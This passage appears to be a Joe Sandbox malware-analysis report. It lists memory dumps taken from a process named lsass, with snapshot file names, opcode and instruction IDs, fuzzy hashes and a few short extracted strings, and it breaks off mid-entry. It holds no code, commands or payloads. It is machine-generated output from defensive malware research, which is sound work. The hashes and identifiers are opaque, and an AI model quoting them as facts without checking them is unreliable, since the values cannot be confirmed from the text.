                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23b273a1a08826d1b8bc1d61c548047a97ae9cd01490883ee88b36607296e47a
                                        • Instruction ID: 763d6fbb1f910c7d5a9d80f8f9722831c523bfee21d4ec3c3f37fc0ee2196731
                                        • Opcode Fuzzy Hash: 23b273a1a08826d1b8bc1d61c548047a97ae9cd01490883ee88b36607296e47a
                                        • Instruction Fuzzy Hash: DEC08C20A0E24B8FF337479480392393764AF46304F2340BAC44E8A8F6CD2A3B099611
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                        • Instruction ID: 23c1ab6935c2875efbf1a70c7ea36ce8b5266d16010fde7bd8eb8d4906734a1f
                                        • Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                        • Instruction Fuzzy Hash: B0B01200D5740F00E43433FA089207970415B44200FC20070D40C8009198CD32D80367
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: c9$!k9$"s9$#{9
                                        • API String ID: 0-1692736845
                                        • Opcode ID: f55fb42346b907c0464accb34b153e20408966f01eb438533c853ee5b221f10f
                                        • Instruction ID: b33f58bc7fd9925b00184f98466e5a05b79c2144674a0d83844a67e63aec78ad
                                        • Opcode Fuzzy Hash: f55fb42346b907c0464accb34b153e20408966f01eb438533c853ee5b221f10f
                                        • Instruction Fuzzy Hash: 4141CD17B0842745E239B3FD78219E95B408FA823FB0847B3F55E8D0C78C082486C2E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5Z_H
                                        • API String ID: 0-3267294416
                                        • Opcode ID: 865b668df4a679c3d222d30438e9f1d025188adbf56b46d10ea893e8ff090c75
                                        • Instruction ID: 35080390a441019a48a973ddf97c7b3542efc0861d6719980894010a90c75027
                                        • Opcode Fuzzy Hash: 865b668df4a679c3d222d30438e9f1d025188adbf56b46d10ea893e8ff090c75
                                        • Instruction Fuzzy Hash: E3911471A09ADD4FE769DB6888397A87FE1FF55314F4001BED099C72E6CBB818048B00
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 28218c442d0edae88ca4dbfdcc4480e3ff11d3dfd0cc602070bc0ca491876614
                                        • Instruction ID: 803c9b1af00525ae78d172053851e9f0baefdd1fede826b18054a60da718a798
                                        • Opcode Fuzzy Hash: 28218c442d0edae88ca4dbfdcc4480e3ff11d3dfd0cc602070bc0ca491876614
                                        • Instruction Fuzzy Hash: A1B10531A0965D8FDB58EF68D855AE97BE0FF1A310F0141BFD45EC72A2CA74A841CB81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 8aeab6326c047d25cecf7ddbae4d6dfda05934276e49fbe667e04110477fc972
                                        • Instruction ID: 5fb0d2af20f350d9d902e3ba63b99c8e4c68ea58e36d34718a641ec8abea3f51
                                        • Opcode Fuzzy Hash: 8aeab6326c047d25cecf7ddbae4d6dfda05934276e49fbe667e04110477fc972
                                        • Instruction Fuzzy Hash: FF412B71E0960E9FDB5ADF94C4A15BDBBB5FF48304F1140BAD01AA72A6CB396A01CB10
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M
                                        • API String ID: 0-3664761504
                                        • Opcode ID: 561e4333ff88aae07d3f20678f624a23317f75b9b839d12ff1309a26a088dfea
                                        • Instruction ID: a06ecdc61bb48b5d4f3855a9795dc5dca9a6addd411e89c0547985577842f719
                                        • Opcode Fuzzy Hash: 561e4333ff88aae07d3f20678f624a23317f75b9b839d12ff1309a26a088dfea
                                        • Instruction Fuzzy Hash: 91F0E56190F3D04FCB1A9A3588288147FA0EE2325074A42EFC095CF1A3DA1CC885C711
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: I
                                        • API String ID: 0-3707901625
                                        • Opcode ID: a13767faad38018a8c398e0a503823e34544ae146c07a1b535f74ac0feed286b
                                        • Instruction ID: 1156787aa9f14a2ba2f82b0063e7e76663150d2d8543ac0d35cecb1882d9e0f1
                                        • Opcode Fuzzy Hash: a13767faad38018a8c398e0a503823e34544ae146c07a1b535f74ac0feed286b
                                        • Instruction Fuzzy Hash: 16E01A6155F7D44FCB1AEB7488799487FA0AF6721078B40EEC185CF1B3E62E9849C702
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: I
                                        • API String ID: 0-3707901625
                                        • Opcode ID: daee4fc830ecf8498c5db4314a0a8b67921098988d73832f88646c6644948511
                                        • Instruction ID: 747938b54df2ee11ef7ab78e720ec2fa1768cc883d02eb2579ca91bbb3114ad7
                                        • Opcode Fuzzy Hash: daee4fc830ecf8498c5db4314a0a8b67921098988d73832f88646c6644948511
                                        • Instruction Fuzzy Hash: DAE01AA154F7D44FCB1AEB74887A8447FA1AE6731178B41EEC186CF1B3E62E8849C701
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2128757439.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bc10000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c9c58ef264d4f702f1f2c66028c4e5202ee344190737da4b534128841e2334ed
                                        • Instruction ID: aefa83b2d5098f9d615a484a31589f298fa638008aacb9dba33d8ede74555dde
                                        • Opcode Fuzzy Hash: c9c58ef264d4f702f1f2c66028c4e5202ee344190737da4b534128841e2334ed
                                        • Instruction Fuzzy Hash: 4C528171E1DA9D4FDB98EB58C8A1EA8B7E1FF68354F0401E9E04DD7292CA357980CB41
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 512342c5d2f11ac5856bb1c812069b5b80b56189beed69167b102704f1232421
                                        • Instruction ID: 7965bd988b5a6d90d9dcd12e0403425a217cee181a4fd3ef41d8af1c1dc2d65e
                                        • Opcode Fuzzy Hash: 512342c5d2f11ac5856bb1c812069b5b80b56189beed69167b102704f1232421
                                        • Instruction Fuzzy Hash: 52C1E37061A6098FEB59CF44C0E16B53BB5FF54311B5142BDC84ACB29BD739E981CB81
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e36ceb3140990f8c67ee919ba54ee94cd60f51004e3ab408b8f22c57fe285deb
                                        • Instruction ID: 19a5cddcba63515e5fa6ef3dd101043ea8956d888ccbec207ad8fb4dcb397c73
                                        • Opcode Fuzzy Hash: e36ceb3140990f8c67ee919ba54ee94cd60f51004e3ab408b8f22c57fe285deb
                                        • Instruction Fuzzy Hash: 9E21E892F0F1AB86F67555ED24310FC6B4C6F46334F1A06B6D49D850E2DC0E2681D293
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31adf167e25326fd6655521bf4dcaa3915c16cd3d0f702c5676cd8b9f1a8c9ba
                                        • Instruction ID: 8104d74edf57e2087f0f82fda6cd5e164bd8d29cbb913ff0aa837130a5d4142b
                                        • Opcode Fuzzy Hash: 31adf167e25326fd6655521bf4dcaa3915c16cd3d0f702c5676cd8b9f1a8c9ba
                                        • Instruction Fuzzy Hash: 1891AE75B0E58D4FE774DA5888679F437D8FF45320B0602BAD09EC71B3D919A906C782
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7cf7272c9cc9ad20bc4a7136a611d6b361657ea7ff3e0b349d1238d1f11a9511
                                        • Instruction ID: 79dd083480b2f3b8fff43092afe271157d2e00193725a0e327021919dda89dc7
                                        • Opcode Fuzzy Hash: 7cf7272c9cc9ad20bc4a7136a611d6b361657ea7ff3e0b349d1238d1f11a9511
                                        • Instruction Fuzzy Hash: 3581ADB1B0EB498FE3398BA8856157577E8FF45310B16057ED48FD32A3CE2AB5428742
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7a9df0dab9b942be40073dc41d9b244638ea6decd61d6f7a9a209a2601d7577
                                        • Instruction ID: b2da312137a996d0406acaadb1d059f6d2356f45983d632e771fbd9211b33648
                                        • Opcode Fuzzy Hash: b7a9df0dab9b942be40073dc41d9b244638ea6decd61d6f7a9a209a2601d7577
                                        • Instruction Fuzzy Hash: DD81B0B06156058FEB1CCF48C0E15B53BB5FF58315B9142BCC84B8B68ADB39E992CB81
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a8c7fea7afafe44fc04bb4f06c8026d6edd10865b19c5377812d0a57f1259ae
                                        • Instruction ID: bc7d21d3e7bcecad65760c7106f48aae9088c5b11404bfffc29458b613e90b63
                                        • Opcode Fuzzy Hash: 8a8c7fea7afafe44fc04bb4f06c8026d6edd10865b19c5377812d0a57f1259ae
                                        • Instruction Fuzzy Hash: BD613A70A0EA4A8FD35ADF58D0A05B4BBA4FF15310B1541BAC44EC7AD7DB29BD51C780
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 88c8c57712e336885033fdec505c0058b072545c2a53ef792cbdf18c8e2eee01
                                        • Instruction ID: 3394946271fdaee85ff3570dec1be37737b7e01d654e3bfefc8b54a1336f6cd4
                                        • Opcode Fuzzy Hash: 88c8c57712e336885033fdec505c0058b072545c2a53ef792cbdf18c8e2eee01
                                        • Instruction Fuzzy Hash: 37610570A0AB4A8FD365CF54D1A05717BE5FF51300B51597EC48AC7AA3CB3AB882CB40
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 959731a4bc2af2ab8616a0f3090ad0ee34e6001bea85f4e551c914cee1b5d5c8
                                        • Instruction ID: ef77e431c7606bd599a516721cef9c8337350204ab2be388bd3808ddcea4d721
                                        • Opcode Fuzzy Hash: 959731a4bc2af2ab8616a0f3090ad0ee34e6001bea85f4e551c914cee1b5d5c8
                                        • Instruction Fuzzy Hash: D9518061B29A1D4FE7A8FB6888BA7B873D6FF98310F4101B9E40DC32E2DD256D458741
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42a99c43255ad7cbd3df3f495e8f75efd95230d82982a471d5e73ea0f3f77d9a
                                        • Instruction ID: 1cb9c33c0e34460854eda12ddc650caebe698094076a5fe639eb870e6adbb39a
                                        • Opcode Fuzzy Hash: 42a99c43255ad7cbd3df3f495e8f75efd95230d82982a471d5e73ea0f3f77d9a
                                        • Instruction Fuzzy Hash: 5D413422B0C6690EE328F7BCA4A56F97B80DF5933AB0405BBE44ECB1D7DD14A841C684
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7be7ff15ccf52f8e2500e04e690bc7277f9304d72f5b36073aa24b331958d49
                                        • Instruction ID: 81f4f44b19de12e66de38076fca37fa067492656114c3bef240544ea6ef565ea
                                        • Opcode Fuzzy Hash: b7be7ff15ccf52f8e2500e04e690bc7277f9304d72f5b36073aa24b331958d49
                                        • Instruction Fuzzy Hash: 83414822B0C6690FE328F7BCA4A55F97B80DF5933AB0405BBE44ECB1D7DD14A841C680
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f6245c6d53f771bdeec7c90a3a961ee5657bce938a123120910d2cca9e56483c
                                        • Instruction ID: 6129ade46b3de4d677875558bd70af123c5920a248dd9bc0f77a25b186f1f8e2
                                        • Opcode Fuzzy Hash: f6245c6d53f771bdeec7c90a3a961ee5657bce938a123120910d2cca9e56483c
                                        • Instruction Fuzzy Hash: 57414471B0D9488FDF98EF28C4A59A4B7E1FB78324B04456AD44AC75A2DE21E845CB81
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a94dafaf67fe5b92a526d994c26771b4badd7f5f294d9ab10c3f22edf1500535
                                        • Instruction ID: 6ac0fcc1bbbe14278b262255691ecd1bd219ea035c8ebcb172155566ee661dd5
                                        • Opcode Fuzzy Hash: a94dafaf67fe5b92a526d994c26771b4badd7f5f294d9ab10c3f22edf1500535
                                        • Instruction Fuzzy Hash: F941503260D9098FDF98EF18D465DA473E1FFA8320B0505AAE44EC7196DE25FC45CB81
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c52a68b9d68affd7c2af645c2b9dee1a3b244ff4e2421a1816882d4806937754
                                        • Instruction ID: 57aaea844f98945e5c28fa0e902b4dbacd9453a5176a06a54cbd361022e192ef
                                        • Opcode Fuzzy Hash: c52a68b9d68affd7c2af645c2b9dee1a3b244ff4e2421a1816882d4806937754
                                        • Instruction Fuzzy Hash: 3D31867160C9488FDB98EF28C4A5DA477E1FF78324B0846ADD44AC75A2DE21F845CB81
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9d091370a63e9ddccdef3bcc84e2246f8631f947ac58dd61b337335bc789f05
                                        • Instruction ID: 918b194f3042889a9ce48c94a3227d7132e632d2865588785767b1339879d820
                                        • Opcode Fuzzy Hash: f9d091370a63e9ddccdef3bcc84e2246f8631f947ac58dd61b337335bc789f05
                                        • Instruction Fuzzy Hash: 4D315E3260D9488FDF5CEF18C465EA473E1FFA9310B0506AEE45EC7196DE25E845CB81
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 402e43f77f0491d3e5512b06a1f13de5f9cb4cb39536367daa46f0a326161f21
                                        • Instruction ID: fb8ecd2c324807d4b28127302ef455ab0e1393bf65535bf54809a3193058541c
                                        • Opcode Fuzzy Hash: 402e43f77f0491d3e5512b06a1f13de5f9cb4cb39536367daa46f0a326161f21
                                        • Instruction Fuzzy Hash: B7310621B1892D0FE768B76C6866AF933C1DF5832AF4005BAE81EC71D7DC18AC458680
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4b68d3f7b72d6bd7b9ed110bb69bb348a86103cdb896ae8e3da8c657ab79e24
                                        • Instruction ID: 0889daadf30cfea94a0a9be57e7607d3f853f641f5fb81432ece4e283c397bd5
                                        • Opcode Fuzzy Hash: a4b68d3f7b72d6bd7b9ed110bb69bb348a86103cdb896ae8e3da8c657ab79e24
                                        • Instruction Fuzzy Hash: 8A31E382A0F7C50FE72246F81C69161BF94EF5265031D82FFE0E49A5E7D948AD498342
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc758fd57ddfc1f1042fa601c594e538781a00464b902af4eb83d4e266abe4fc
                                        • Instruction ID: 42fd417d77cb6f652ec17d75603295f93a5c2c9fc1af12c12c0e1b7cf8f1934d
                                        • Opcode Fuzzy Hash: dc758fd57ddfc1f1042fa601c594e538781a00464b902af4eb83d4e266abe4fc
                                        • Instruction Fuzzy Hash: D5319371B0C9498FDB98EF28C4A5DA4B7E1FF78320B0406ADD44AC75A2DE25F845CB81
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 17d97cf4d5499cf9a768fba0c50eb27965c237e82602ece4c3177e61bd6c1289
                                        • Instruction ID: 9dfff0f25abb073a2f1d6c24e7e1336136824c0324f50afe1082095a2ebf2377
                                        • Opcode Fuzzy Hash: 17d97cf4d5499cf9a768fba0c50eb27965c237e82602ece4c3177e61bd6c1289
                                        • Instruction Fuzzy Hash: 1631413260D9498FDF68EF18C465EA473E1FFA8710B0505AEE44EC7196DE25F885CB81
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 974fd0c49b58d40db7a6afe6ac996984c0cfb008be2212a562ce783983b2fc18
                                        • Instruction ID: 40ac5be5e16de5768afa088079747a18baf0a38468da838e292deae42724afe4
                                        • Opcode Fuzzy Hash: 974fd0c49b58d40db7a6afe6ac996984c0cfb008be2212a562ce783983b2fc18
                                        • Instruction Fuzzy Hash: EE317471B09A0E5FDB54DE98D5A29B8F7E5FF44310B114239D01ED3692DF247912CB80
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a14bc2659f3904261ebc1a3299d36560aedc949a46add41c753434c52c85518c
                                        • Instruction ID: eaf7ecf8f8f708e2d78d61ba3390858b626b293fd36150bcc485da864f690ecb
                                        • Opcode Fuzzy Hash: a14bc2659f3904261ebc1a3299d36560aedc949a46add41c753434c52c85518c
                                        • Instruction Fuzzy Hash: 97316E70A1EA4ECFDBA8EF9484615BD77B8FF54701F51017AD00EC21A2DB3A6E448745
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c7c91ebfd6511bf2ae7cb04271f613db3fa0b60411b2902bddc540cb6b9136c9
                                        • Instruction ID: c13483a01d061de2fa9e6e57f6a2187e703c664a6fd33fae231950cab7a60662
                                        • Opcode Fuzzy Hash: c7c91ebfd6511bf2ae7cb04271f613db3fa0b60411b2902bddc540cb6b9136c9
                                        • Instruction Fuzzy Hash: 83216B21B1892D0FF758F76C9469AB972C2EF9C320F4000B9E81DC32E7DD54AC458681
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 77a35b1b357d646c75e6d94d74f1008062ffb101b7fb2fbd9ef622ec0643b5fb
                                        • Instruction ID: a6691f9b8615e079f183b4c49ab229c6998fd9b2e9d6e3adeefa6c9a8779e20f
                                        • Opcode Fuzzy Hash: 77a35b1b357d646c75e6d94d74f1008062ffb101b7fb2fbd9ef622ec0643b5fb
                                        • Instruction Fuzzy Hash: E4213961F0E64D4FEB68A7E484622B8BBE8EF45310F050179D04DD32D3D91A99068740
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad2263015e6e58c53404c0a255146b9140dc95305104888791782804becb5ad3
                                        • Instruction ID: a7c76e50d62187430b9537b567766d2d0bd04442929fd7f992ea7d948c773638
                                        • Opcode Fuzzy Hash: ad2263015e6e58c53404c0a255146b9140dc95305104888791782804becb5ad3
                                        • Instruction Fuzzy Hash: 8F21AB3160EA4E8FE7279B5488656F83798FF05300F0506BAD419CB2E2CA6A6605C781
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06aaf398a37097e242a4bedf0f3adca6a36caab2a017acd911529f8d0967e231
                                        • Instruction ID: d5779e646208f80ea610f81898db4520580076f458b8d556c0193aae41735f2d
                                        • Opcode Fuzzy Hash: 06aaf398a37097e242a4bedf0f3adca6a36caab2a017acd911529f8d0967e231
                                        • Instruction Fuzzy Hash: 2D313A74A0991C9FDF98DB58C865AECB7B5FF59310F0002ADE04EE32A1CE35AA40CB41
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 44db29ac3f17607f351c8a5528f571aaea279313c5665ea1f4ec7f1c7d00c830
                                        • Instruction ID: 93ea4a5b1af4f4519ee3d648a24d17ec001cdcfff7e9cc1d537b35fd0ff1bc67
                                        • Opcode Fuzzy Hash: 44db29ac3f17607f351c8a5528f571aaea279313c5665ea1f4ec7f1c7d00c830
                                        • Instruction Fuzzy Hash: EE311CB0A1E90ECFEBA8DB9484625BD76EDFF44301F51047AE41FD21A1DA3A6A409B41
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c675962be026c5a6a83d17fa0d9ae10361877331b86f9b447437e2dce15cf149
